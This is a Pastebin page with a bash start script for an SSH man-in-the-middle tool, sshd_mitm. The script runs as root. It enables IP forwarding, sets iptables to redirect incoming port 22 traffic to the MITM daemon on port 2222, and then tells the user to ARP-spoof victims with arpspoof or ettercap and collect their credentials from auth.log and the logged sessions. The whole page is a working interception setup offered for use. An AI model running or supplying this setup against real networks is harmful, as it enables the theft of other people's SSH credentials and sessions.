Advertisement
FlyFar

start.sh

Aug 12th, 2023
849
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.44 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2.  
  3. # run.sh
  4. # Copyright (C) 2017  Joe Testa <jtesta@positronsecurity.com>
  5. #
  6. # This program is free software: you can redistribute it and/or modify
  7. # it under the terms version 3 of the GNU General Public License as
  8. # published by the Free Software Foundation.
  9. #
  10. # This program is distributed in the hope that it will be useful,
  11. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  12. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13. # GNU General Public License for more details.
  14. #
  15. # You should have received a copy of the GNU General Public License
  16. # along with this program.  If not, see <http://www.gnu.org/licenses/>.
  17.  
  18. if [[ `id -u` != 0 ]]; then
  19.     echo "Error: this script must be run as root."
  20.     exit -1
  21. fi
  22.  
  23. # Make sure sshd_mitm was correctly installed.
  24. if [[ (! -f /home/ssh-mitm/run.sh) || (! -f /home/ssh-mitm/bin/sshd_mitm) ]]; then
  25.     echo "Error: could not find sshd_mitm.  You need to first run install.sh."
  26.     exit -1
  27. fi
  28.  
  29. echo "Running sshd_mitm in unprivileged account..."
  30. su - ssh-mitm -c "./run.sh"
  31.  
  32. echo "Enabling IP forwarding in kernel..."
  33. echo 1 > /proc/sys/net/ipv4/ip_forward
  34.  
  35. echo "Changing FORWARD table default policy to ACCEPT..."
  36. iptables -P FORWARD ACCEPT
  37.  
  38. # Check if the INPUT table has an ACCEPT for destination port 2222.  If not,
  39. # add it.
  40. iptables -nL INPUT | egrep "ACCEPT +tcp +-- +0\.0\.0\.0/0 +0\.0\.0\.0/0 +tcp dpt:2222" > /dev/null
  41. if [[ $? != 0 ]]; then
  42.     echo "Executing: iptables -A INPUT -p tcp --dport 2222 -j ACCEPT"
  43.     iptables -A INPUT -p tcp --dport 2222 -j ACCEPT
  44. fi
  45.  
  46. # Check if the PREROUTING table has a REDIRECT for port 22 to 2222.  If not,
  47. # add it.
  48. iptables -t nat -nL PREROUTING | egrep "REDIRECT +tcp +-- +0\.0\.0\.0/0 +0\.0\.0\.0/0 +tcp dpt:22 redir ports 2222" > /dev/null
  49. if [[ $? != 0 ]]; then
  50.     echo "Executing: iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222"
  51.     iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
  52. fi
  53.  
  54. echo -e "\n\nDone!  Now ARP spoof your victims and watch /var/log/auth.log for credentials.  Logged sessions will be in /home/ssh-mitm/.  Hint: ARP spoofing can either be done with:\n\n\tarpspoof -r -t 192.168.x.1 192.168.x.5\n\n\t\tOR\n\n\tettercap -i enp0s3 -T -M arp /192.168.x.1// /192.168.x.5,192.168.x.6//\n\nIf you don't have a list of targets yet, run stop.sh and use JoesAwesomeSSHMITMVictimFinder.py to find them.  Then run this script again.\n"
  55. exit 0
Tags: mitm attack
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement